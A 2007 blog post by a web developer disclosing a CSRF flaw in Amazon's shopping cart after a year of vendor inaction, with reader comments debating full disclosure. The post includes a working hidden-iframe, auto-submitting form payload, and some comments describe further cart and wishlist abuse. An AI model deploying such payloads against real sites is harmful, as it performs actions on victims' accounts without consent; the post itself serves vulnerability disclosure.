About the Author

Chris Shiflett

Hi, I’m Chris: web craftsman, community leader, husband, father, and partner at Fictive Kin.


My Amazon Anniversary

Today I am revealing an exploitable security vulnerability in Amazon. Before I do, I want to provide some history and context.

On this day last year, I informed Amazon about a pretty serious vulnerability and demonstrated it with a few examples and a detailed description. In the description, I explained how to exploit the infamous "1-Click" feature, causing victims to purchase items of my choosing without their knowledge or consent, and I stressed that the scope of the problem extended beyond my benign examples. After some mild prodding, I finally received a reply letting me know that my email had been received, the vulnerability had been verified, and Amazon considered fixing it a top priority.

This is usually the extent of my involvement in such affairs. It's remarkably easy to find vulnerabilities in web applications, so I see no reason to make a big deal out of every discovery. Plus, it's enough trouble to inform web sites about vulnerabilities (something many of my colleagues don't bother doing for good reasons), so once I've done so, I feel like I've fulfilled my ethical responsibility.

Despite my prodding, the vulnerability remains a year later.

I feel like Amazon has exploited my cooperative behavior and placed me in a moral dilemma. In fact, at this point, I feel like I've already done the wrong thing by withholding this information for so long. The silence ends today.

The following example demonstrates the problem:

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<script>document.csrf.submit();</script>

This exploit is pretty benign, because it only adds an item to your shopping cart. Always be sure to inspect your cart carefully each time you check out!

Yes, this is CSRF, and I plan to update my article in the next few days to include Amazon and Digg as examples, and I'll elaborate a bit more on the various techniques in use today.

Amazon has started requiring re-authentication in several places, so many actions are protected against CSRF. For example, the "1-Click" feature has been improved to protect against this, because adding a new address now requires re-authenticating. This is a good thing.

This entire affair has me rethinking my stance on full disclosure, something I alluded to in a recent interview. The wikipedia article on full disclosure has this to say about responsible disclosure:

One challenge with "responsible disclosure" is that some vendors do not respond, or inordinately delay their response, to vulnerability reports that are not public. As long as a vulnerability is not widely known to the public (with enough detail to reproduce the attack), vendors may refuse to fix the vulnerability or refuse to give it enough priority to actually repair it. Unfortunately, vulnerabilities reported to a vendor may already be exploited, or may soon be detected by someone with intent to exploit them.

This is my primary concern. There's nothing particularly sophisticated about this attack, so I feel confident that someone else has discovered it by now, and as a user of Amazon myself, I'm not comfortable with that.

The RFPolicy offers a reasonable middle-ground; perhaps that's the best approach.

About this post

My Amazon Anniversary was posted on Thu, 15 Mar 2007. If you liked it, follow me on Twitter or share:

41 comments

1.David said:

Sorry. My shopping cart is still empty. I understand the concept behind the attack, but perhaps Amazon fixed the problem in the past 45 minutes? Or will it only add an item to your cart if you have 1-Click turned on?

Thu, 15 Mar 2007 at 22:38:28 GMT Link


2.gasper said:

You have an HTML link typo in the post at the beginning of the paragraph that starts with "Yes, this is ...".

Thu, 15 Mar 2007 at 23:42:04 GMT Link


3.Martin P said:

I thought you were waiting until next months issue of PHP|A to talk about this? Hm, oh well. :)

Fri, 16 Mar 2007 at 02:05:34 GMT Link


4.Pete Lindstrom said:

You can shoot for the moral high ground as much as you want, but you are way below sea level on this one. You increased the risk to Amazon's customers, probably by orders of magnitude with this post, and all in the name of some sort of self-serving morality play.

Vulnerabilities are everywhere. They exist now, on the Internet. Most of them, you don't even know about. When you make an announcement like this, it increases the threat and focuses malicious efforts on this hole. What gives you the right to choose which vulns are important and which ones aren't? Why is this particular pot-shot so much more important than all the others that may be out there?

Pete

Fri, 16 Mar 2007 at 03:31:52 GMT Link


5.Martin P said:

Pete, I think you miss the point in that amazon was made aware of this problem and has sat on it for a year without doing anything about it. Why blame Chris? I'm more insulted as a customer. If anything, this kind of exposure will get the hole fixed sooner rather than later, making whoevers next purchase a much more relaxing one.

Or would you rather the people that currently do know about it simply continue to get away with using it?

Fri, 16 Mar 2007 at 03:57:57 GMT Link


6.Pete said:

@Martin -

How can you be sure nothing was done? How can you be sure they didn't fix 200 other vulnerabilities that were more significant that you didn't know about? Who knows, relatively, how significant this hole really is?

There are hundreds of millions of vulnerabilities on the Internet - really. The fact that Chris found one doesn't make it special... actually, it does now because he is focusing the threat.

I had to laugh at your "relaxed" purchase comment - it was a joke, right?

Pete

Fri, 16 Mar 2007 at 04:25:48 GMT Link


7.John Layman said:

@Pete:

If Amazon really considered it a "top priority" I would hope they could have addressed it within a year. I feel that this was a very generous time period. If it takes disclosure to motivate them to fix it, then at least it gets done. As Chris said, I'm sure he's not the only person who has figured this exploit out by now.

Sure, this might temporarily increase the level of vulnerability, but if it inspires Amazon to take documented vulnerabilities more seriously, I'd say its worth it.

Fri, 16 Mar 2007 at 04:46:28 GMT Link


8.Pete said:

@John -

This doesn't increase the vulnerability, it increases the threat. It is entirely artificial and arbitrary, and therefore bad.

Feel free not to confuse an emotional reaction to being slighted and blustered by Amazon as some sort of legitimate reason to screw everyone else over.

And no, attackers don't know about this particular one. There are actually four others* they know about that you don't and they are actively exploiting those.

"I'd say it's worth it" - while you have every right to say whatever you want, that doesn't give you the right to determine for others what is or isn't "worth it."

And tell me again why this is a good thing... is it the grudge part or the spite part?

*a dramatization to highlight the fact that uncertainty is hard to deal with, but it is the state in which we live.

Fri, 16 Mar 2007 at 05:04:50 GMT Link


9.David Rodger said:

Gee Pete,

if you think that Chris, with his soul-searching, is screwing everyone over by disclosing this after a whole year, what do you think of Stefan Esser's approach, where, if you haven't fixed the vulnerability after a week, it's exposed and he calls you all sorts of names!?

Fri, 16 Mar 2007 at 06:25:54 GMT Link


10.Gestowitch said:

Gee Pete, what a bullsh....., Amazon ... vulnerability ... one year ... lol

Fri, 16 Mar 2007 at 12:16:30 GMT Link


11.shrdlu said:

@Pete -

"Vulnerabilities are everywhere. They exist now, on the Internet. Most of them, you don't even know about. When you make an announcement like this, it increases the threat and focuses malicious efforts on this hole. What gives you the right to choose which vulns are important and which ones aren't? Why is this particular pot-shot so much more important than all the others that may be out there?"

Simple. HE KNEW ABOUT THIS ONE. Because he knew, and tried to get it fixed, without success, he felt obligated to do what he could to increase the chances of getting it fixed. Why is this so hard to understand, Pete?

"And no, attackers don't know about this particular one. There are actually four others* they know about that you don't and they are actively exploiting those."

As Pete claims to speak for all attackers ... How do you know that this one isn't being exploited too? How do you know that posting this vulnerability does, in fact, increase the threat as opposed to increasing the chance that the vulnerability will finally be closed? You don't.

"And tell me again why this is a good thing... is it the grudge part or the spite part?"

Why, it's the ad hominem attack part, of course!

Fri, 16 Mar 2007 at 13:21:18 GMT Link


12.Ed said:

Pete, as an amazon customer I applaud Chris.

I'd rather know the threats to my online safety, (even if that knowledge puts me at more risk ,which it may not) and use that knowledge to make informed decisions than live in absolute ignorance, unable to make any sort of judgment about my online safety.

Plus I find your argument about there being far more significant vulnerabilities therefore this vulnerability is insignificant and should be ignored absurd

Fri, 16 Mar 2007 at 13:50:07 GMT Link


13.Edward Yang said:

Can anyone confirm whether or not the exploit still works? If it had been fixed as David suggests, there could be a possibility that Amazon saw this blog post, fixed it, and thus full disclosure works. (or, possibly, the timing was extremely lucky, and Amazon had just gotten around to fixing it).

Fri, 16 Mar 2007 at 16:39:20 GMT Link


14.Pete said:

@David - In my opinion, Stefan and Chris are in essentially the same boat with the obvious caveat that volume of activity in this space is more damaging.

@Gestowitch - if you've only worked in a two-person company, you would have that perspective.

@shrdlu -

1) It's not hard to understand at all - people often try to characterize others and pretend to understand their work environments and exaggerate their own personal beliefs and try to force them on everyone else.

2) I recognize that it feels good to be certain about a few things and be able to address them. What I am suggesting is that this is not only insufficient, but also distracting. Whatever vulnerabilities are being exploited are the ones I want to pay attention to and if I have to (now) expend extra resources on one particular one, that means it is clear sailing on any others.

@Ed -

1) If your definition is shortsighted and based on the fixing of a single vulnerability, and you don't care about what it does to the risk equation, and if the attackers only happen to have this particular vulnerability available to exploit, then you might be right.

2) You don't need to live in absolute ignorance to embrace the idea that you can't know about every single vulnerability and therefore need to protect yourself using techniques that don't rely on that.

3) I didn't make the argument you claim. I argue that significance is a measure of risk - threats, vulns, and consequences. This vuln has now been elevated in significance (greater risk) through this announcement. There are (were) other equally significant vulnerabilities that get less attention that are now in the same boat as this one was, and you can't find them all. Time to come up with a new strategy for protection rather than bailing fruitlessly in a sinking ship.

My last post here. If you want to take it offline, you can find me on the Web fairly easily.

Pete Lindstrom

Fri, 16 Mar 2007 at 19:22:33 GMT Link


15.Ian said:

Kudos Chris,

Keep the vulnerabilities coming. It keeps the big corporations from becoming complacent.

All vulnerabilities highlighted by the Month of Apple Bugs were fixed (well at least by Apple), so it works.

Keep up the good work!

Sat, 17 Mar 2007 at 00:16:24 GMT Link


16.Aaron Wormus said:

It's not a bug, it's the 0-click (tm) checkout system.

Sat, 17 Mar 2007 at 10:35:21 GMT Link


17.Gestowitch said:

@Pete: My last post here.

Thanks Pete

Sat, 17 Mar 2007 at 11:03:47 GMT Link


18.Geoffrey Young said:

getting hit from all sides doesn't seem like much fun to me...

if I were to find something like this I'd probably just submit it to cert and let them take the initiative with amazon (and the heat when they release the information after 45 days, or whatever it is). for example, you can check cve for amazon vunerabilities and let yours just be added to the list. presumably, a company like amazon is more likely to respond to something formal like these organizations than to a random email or blog post :)

Sun, 18 Mar 2007 at 17:21:02 GMT Link


19.Chris Shiflett said:

David wrote:

Sorry. My shopping cart is still empty.

If you want to try this, I have a temporary example that demonstrates the problem. The vulnerability is easy to fix, so hopefully it won't persist much longer.

Pete Lindstrom wrote:

You increased the risk to Amazon's customers, probably by orders of magnitude with this post, and all in the name of some sort of self-serving morality play.

I'm glad more people don't share your perspective, because it's a dangerously naive one.

I expect some people to criticize me for withholding this information for so long, but I don't like disclosing vulnerabilities before they have been fixed.

Since you seem to be brazenly misinterpreting my post, here's a clarifying list of facts:

1. This vulnerability has existed for years.

2. Amazon has known about it for over a year.

3. It's easy to fix.

Your ad hominem attacks are childish and highlight the lack of a logical foundation to your argument. Regardless, here are a few things that lead me to disclose the vulnerability now:

1. Adding a new address now requires re-authentication, so the "1-Click" exploit no longer works.

2. There may indeed be other CSRF vulnerabilities, but adding arbitrary items to someone's shopping cart is the only one of which I'm currently aware.

3. Users who are aware of this vulnerability are more empowered, because they know to be cautious before checking out. Thus, more awareness is a good thing, even if Amazon continues to ignore the vulnerability.

You're welcome to abide by the ignorance is bliss philosophy, but your evangelical efforts are not appreciated.

Finally, as an example of my persistence. here's an excerpt from an email I sent to several of Amazon's senior security contacts about five months after my first disclosure:

I feel that you're placing me in an ethical dilemma and adding strength to the arguments of those who support full disclosure. Out of respect for me and my sincere and persistent efforts, please take active steps to address this vulnerability.

Aaron wrote:

It's not a bug, it's the 0-click (tm) checkout system.

Very funny. :-)

Geoffrey Young wrote:

For example, you can check cve for amazon vunerabilities and let yours just be added to the list.

Good idea. Thanks!

Sun, 18 Mar 2007 at 20:12:58 GMT Link


20.sid said:

@Chris

: you did what you could do. if a optimal pattern of behavior exists in this case, it's probably the one you showed, so stop worrying about it :)

@Pete

: so, is ' ignorance is bliss ' the bottom line of what you are saying?

frankly i would prefer knowing about the bug, being a little more paranoid, thus even more careful.

i just tried the temporary example. fully works.

there is absolutely no excuse for Amazon for not fixing this during a year timespan ( supposing that chris was the first one to tell them about it ).

Mon, 19 Mar 2007 at 09:08:16 GMT Link


21.Chris Shiflett said:

If a optimal pattern of behavior exists in this case, it's probably the one you showed, so stop worrying about it :)

Thanks, Sid. :-)

Mon, 19 Mar 2007 at 11:17:17 GMT Link


22.Charles said:

Hmmm, I have a book by Chris Shiflett in my Cart. Nice.

Thu, 22 Mar 2007 at 20:52:20 GMT Link


23.Morad Rayyan said:

Amazon deserves this. They could've take care of this right away, just in case if "Chris" announces it on his site the next day after his email. But nope, they just to drop the ball :)

Sat, 24 Mar 2007 at 22:08:37 GMT Link


24.Drew Hintz said:

Vuln disclosure for web client security is even more thorny than disclosure for traditional applications. I wonder how it will play out.

Sun, 25 Mar 2007 at 16:29:26 GMT Link


25.Drew Hintz said:

@David, the exploit worked for me.

Sun, 25 Mar 2007 at 16:48:24 GMT Link


26.Mohamed Almasry said:

good man .. but i think this is not ethical .. any way ..

Wed, 28 Mar 2007 at 04:41:32 GMT Link


27.Jeremy said:

Worked for me as well ... once I turned on NoScript for the domain. Another good reason to run with javascript protection turned on.

Fri, 30 Mar 2007 at 19:15:01 GMT Link


28.anon said:

Congratulations on rising to the bait. Pete has now publicly stated that he will keep security vulnerabilities private forever, no mater how many people it keeps in the dark or endangers, going against his rebellious peers.

Companies like Amazon, which apparently wait to fix holes until some ROI threshhold is met (1,000 users exploited, 10,000 users?), love that sort of mentality.

And Pete happens to own a security company that does consulting work...

2 + 2 together...

Wed, 04 Apr 2007 at 17:30:07 GMT Link


29.Viv said:

With Pete's idea, it's kind of like seeing the drug dealer passing his drugs to school kids and just closing his door to it! Tsk! Tsk! Tsk!

Sat, 28 Apr 2007 at 20:31:48 GMT Link


30.Wouter said:

Chris,

Do you know if orders for your book have increased with Amazon? :)

Tue, 01 May 2007 at 13:19:50 GMT Link


31.Dave Riley said:

For what it's worth, the exploit is *still* working... clicked on Chris' link to the demo he posted midway through the comments above, and his book is now sitting in my shopping cart (and if I still coded in PHP, I might consider buying it :-).

Thu, 28 Jun 2007 at 17:47:45 GMT Link


32.David Wolf said:

Still works after almost 4 months of this blog posting. Amazon knew about this a year before that. How long is Amazon going to take?

Thanks for revealing this, Chris. It just doesn't make sense that companies the size of Amazon, with tons of resources, can't solve issues like this quickly. It just all comes down to resource allocation. If they had to they could probably afford to hire enough programmers so they have one for every vulnerability they know about. That would be absurd, of course, but they could do it if they needed to. But as long as the site still brings in dollars they don't feel the urgency to do that. (But if the money stopped flowing their way you know they would have EVERY available resource focused on the problem.)

If Chris has a solution to the issue why don't they just fix it and move along? I really don't appreciate it when people disclose vulnerabilities without ample warning to the developer. That really seems irresponsible. But Chris has given Amazon MORE than enough time to respond. If Chris has the solution, and the folks at Amazon don't have the time to figure out the fix, Amazon certainly has the resources to ask Chris for some help.

Here are some policy suggestions for Amazon:

Amazon should offer a small reward for anyone reporting a vulnerability if they also provide the solution. Then identify one person on their development team who's sole job it is to implement the fixes. That would make all of the easy-to-fix issues disappear quickly. Have a stated policy to have any vulns reported in this way fixed within 30 days. (Should be shorter, but this still gives Amazon flexibility to prioritize issues based on urgency.) Remember, these are vulns reported where the solution is given to them at the time of reporting.

Amazon could have another policy to handle vulns reported without solutions. These would be handled by a different team. They should confirm receipt of the report within 24 hours, confirm the problem and an estimated time for dealing with the issue with the reporter within 1 week and ask that the vuln not be revealed publicly for at least 30 days. Any serious problem should get dealt with within 30 days. Anything minor enough not to get attention within 30 days should not be a big issue for public disclosure. (Or so one would hope.) If a serious issue is so big that Amazon can't fix it in 30 days then they should be in close contact with the people who reported the issue to ask for more time before disclosure, and to ask them for help with solutions.

Finally, Amazon should start a policy of reducing the bonuses of executives and managers every time a vulnerability remains on their list longer than 30 days.

If just this last item became policy something tells me most of the issues would disappear right away.

Thu, 05 Jul 2007 at 18:52:39 GMT Link


33.Amer Neely said:

I applaud your actions completely. Hiding your head in the sand when security is involved is ridiculous. I also appreciate your dilemma.

You are probably aware of a problem with PayPal button forms. As a Perl developer, I was tasked with implementing a PayPal button on a client's site. During this process I discovered what I thought was a major 'loop hole'. At first I thought I was missing something, but in several emails and phone calls to PayPal, I realized (and they confirmed) that yes, that is the way the buttons work.

I'm not going to go into details here - this is not my soapbox - but just to give you some support and say good luck with your choices.

Sun, 15 Jul 2007 at 16:22:43 GMT Link


34.Takuan Daikon said:

I can't believe that still works O.o

Fri, 20 Jul 2007 at 13:30:32 GMT Link


35.Francis said:

Still works....

Sat, 21 Jul 2007 at 12:57:50 GMT Link


36.Martin said:

Hey Chris,

It still works.

And Amazon probably spend more thoughts on this security problem than you thought.

Here is my explanation:

The basic Idea of one-click links is that any website can automatically drop an item into your shopping cart, once you clicked on some button on that website, right? To prevent websites from implementing the zero-click solution you would have to embed a token into the link - a new and unique token would have to be served with every single buy-now-link.

This simply does not work for static HTML pages.

( and Amazon associate links are supposed to be embeddable in simple static HTML ) Of course the dynamic part could be on the client-side, possibly a script that dynamically embeds a one-click link when the page is displayed, but then one-click links would not work for browsers with javascript disabled. Additionally this would increase the shopping barrier, rather than lowering it, which is what the one-click idea is all about.

The best solution would be to use an embedded iframe-element and host the complete ad at Amazon, using some token mechanism. But nevertheless this would require gazillions of webmasters to exchange the snippets they embedded in their old HTML!

On the day the "security-hole" is closed none of the old buy-now links would work anymore, or would require a second confirmation step, effectively turning each one-click links into a two-click link.

Mon, 10 Sep 2007 at 12:29:58 GMT Link


37.Martin said:

I have checked the Amazon Associates program, and they actually have come up with a solution:

The links that you can automatically generate at the Amazon Associates Center, contain a new URL that provides the ad inside an IFRAME element - with an individual SessionID created each time. If you mess with the SessionID Amazon will gently switch to a two-click solution, asking the user to confirm that he really wants to put the product in his shopping basket (using the SessionID to prevent CSRF attacks)

The new solution is located at a new URL:

http://www.amazon.com/gp/aws/cart/add.html

parameters are passed via GET request. Just add ASIN.1=059600656X and Quantity.1=999 ;)

I think Amazon just keeps the old solution running, hoping that the Amazon links floating around on the web that still use the old URL will eventually die out. I guess if a critical mass is reached they will add a confirmation step to the old URL as well...

Mon, 10 Sep 2007 at 13:01:39 GMT Link


38.Martin said:

I think it is also interesting to note that websites can not only drop stuff in your shopping basket without your consent, but they can also mess with your wishlist.

Just imagine a website that enhances your wishlist, by the latest literature on some arbitrary sexual fetish.

This will not only render your amazon recommandations completely useless and anoying, but if your wishlist is public (and that is what wishlists are for) you may face a very big surprise on your next birthday or christmas.

Your parents in law might even cancel the wedding, if they discover all those gay coming-out books that suddenly show up in your Amazon wedding-list. Well you get the idea.

Fortunately their are nos such things as CSRF attacks for good old pen-and-paper lists :)

While most people probably doublecheck orders they make on amazon, no one regularily check his own wishlist...

Mon, 10 Sep 2007 at 14:03:22 GMT Link


39.Heather P said:

I applaud this disclosure, and agree with previous posters who say that a year is more than enough time to fix a simple error.

I would be less concerned about these kinds of issues if Amazon had some kind of security/fraud policy that protects their customers. But, as I sadly just found out, they have no such policy.

Because of what just happened to us, I recommend that everyone who uses Amazon removes their payment information from the site. It's a pain to have to enter your card numbers each time, but it is infinitely more safe.

Short story: Someone hacked my husband's Amazon account and changed the email and password and shipping address. Because they do not require users to confirm such changes before purchases, the hacker charged almost $600 to our card before my husband could respond to the change alert and let Amazon know that he was not the one who changed the account information.

It has now been a week and a half, and after numerous emails and phone calls their only answer is for us to dispute the charge at our bank. They even shipped the merchandise three days after we informed them that it was a fraudulent charge.

Their ineptitude is why information like this is so important to the consumer. Everyone I know is removing their payment info from the website now as some kind of weak counter measure. But it's sad, because it would be so easy for them to fix this as well. But I'm sure they won't. It's their way.

Fri, 09 Nov 2007 at 23:14:01 GMT Link


40.Lewyx said:

Pete's arguments made me laugh. If amazon had really that much bugfixing todos for a year that were more severe, then I 'd better not be their client. As seen below solution is underway and the hole is only kept open for backward-compatibility. Why I don't see big announcents that propagate the migration their new 1clk-links? I agree that they don't react prompt enough.

Regarding the disclosure: it is verified by informing future victims. If I get something I've never ordered, now I not just accept it with thinking that my son stole my password, but have a way to defend myself, thanks to this publication. I agree that this elevates the risk, but I think it's worth protecting amazon clients through clarifying responsibilities.

Mon, 21 Jan 2008 at 09:24:09 GMT Link


41.Bryan Lee said:

I agree that Chris did the right thing by pointing out the vulnerabilities of Amazon. If Chris has found this vulnerability, I'm pretty sure that there are many others out there that have already found it by now. So, please stop pretending that only Chris knows it or doing something wrong by posting it. It has been for more than a year, ok? That means... a high possibility that somebody has already found it.

This actually shows that Amazon is either lacking in IT personnel/expertise or they just don't value it if they took more than a year to fix a bug. More than anything, this should force corporations like this to appreciate their IT personnel more and thus create more jobs for us. I cannot believe that a big firm like amazon that gets its revenue mostly from online sales will want to be complacent about these issues.

oh, by the way, out of curiosity, pete, do you work for amazon?

Wed, 15 Oct 2008 at 09:36:46 GMT Link


Hello! What’s your name?

Want to comment? Please connect with Twitter to join the discussion.